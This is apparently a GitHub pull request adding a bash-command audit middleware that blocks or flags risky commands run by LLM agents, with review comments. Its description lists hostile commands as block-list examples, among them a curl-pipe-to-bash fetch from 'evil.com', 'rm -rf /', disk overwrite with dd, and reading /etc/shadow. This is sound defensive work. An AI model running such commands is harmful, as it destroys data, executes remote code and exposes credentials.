### PR TITLE
feat(sandbox): add SandboxAuditMiddleware for bash command security auditing

### LINKED ISSUE #1224: 通过生产环境部署能够穿透到物理环境
为什么通过docker部署的, 能够删除我其他的容器的? 而且能否访问到我物理路径?

### PR DESCRIPTION
**Pull request by syzhang622**
## Related Issue

Closes #1224 — LocalSandbox bash tool can execute destructive commands against the host filesystem when prompted.

## Problem

When using `LocalSandboxProvider`, the `bash` tool has no command-level safety checks. An LLM misled by prompt injection or hallucination can execute commands like `rm -rf /`, `curl http://evil.com/x.sh | bash`, or `dd if=/dev/zero of=/dev/sda` directly on the host.

## Solution

Add `SandboxAuditMiddleware` at the middleware layer — no changes to the sandbox execution layer itself.

**Three-tier command classification:**

| Tier | Examples | Action |
|------|----------|--------|
| High-risk | `rm -rf /`, `curl url \| bash`, `dd if=`, `mkfs`, `cat /etc/shadow` | Blocked — returns error ToolMessage, handler not called |
| Medium-risk | `pip install`, `apt install`, `chmod 777` | Executed, warning appended to result |
| Safe | Normal workspace operations | Passed through unchanged |

**Audit log**: every bash call is recorded as a structured JSON entry via the standard logger, visible in `langgraph.log`.

## Design Notes

- Registered after `GuardrailMiddleware`, applied to both lead agent and subagents
- High-risk blocks return `status="error"` ToolMessage so the agent loop continues gracefully (LLM retries or changes approach)
- Medium-risk commands execute with a warning rather than blocking, avoiding false positives for legitimate package installs in dev workflows
- No config switch in this MVP — can be added as a follow-up if needed

## Test Coverage

`tests/test_sandbox_audit_middleware.py` covers:
- Command classification (high/medium/safe), including edge cases
- `wrap_tool_call` integration (handler called/not called, warning appended)
- Audit log written for every bash call
- Precision/recall benchmark: 100% high-risk block rate, 0% false positive rate

### CODE REVIEW

**Comment by syzhang622** [comment]
@WillemJiang  Thanks for the review! Addressed all 6 comments:

1. Narrowed `rm` high-risk regex to only target destructive paths (`/`, `/*`, `~`, `/home`, `/root`) — workspace paths like `/mnt/user-data/` no longer false-positive
2. Fixed `_append_warn_to_result` to handle list-typed `content` (append a `{"type": "text"}` block instead of `str()`-ing the list)
3. Updated class docstring to match implementation (medium-risk executes with warning, removed stale cwd note)
4. Added async tests for `awrap_tool_call` mirroring the sync suite
5. Removed `capsys.disabled()` from benchmark test
6. Cleaned up misleading "cwd fix" in test module docstring

**Comment by WillemJiang** [comment]
@syzhang622, please run the commands below to fix the format errors. Here are some review comments that need to be addressed.
```
cd backend
make format
```

File: backend/packages/harness/deerflow/agents/middlewares/sandbox_audit_middleware.py [hunk 1]
```diff
@@ -0,0 +1,203 @@
...
+        return thread_id
+
+    def _write_audit(self, thread_id: str | None, command: str, verdict: str) -> None:
+        record = {
+            "timestamp": datetime.now(UTC).isoformat(),
+            "thread_id": thread_id or "unknown",
+            "command": command,
+            "verdict": verdict,
+        }
+        logger.info("[SandboxAudit] %s", json.dumps(record, ensure_ascii=False))
```
[the remark this answers is not in the document]
Comment (syzhang622) [reply backend/packages/harness/deerflow/agents/middlewares/sandbox_audit_middleware.py:115]: Audit log is written to the local langgraph.log and not transmitted externally, so the risk is limited. Sensitive command redaction can be addressed as a follow-up if needed.

**Comment by syzhang622** [comment]
Hi @WillemJiang   
Done — applied `make format` and addressed all Copilot review comments.
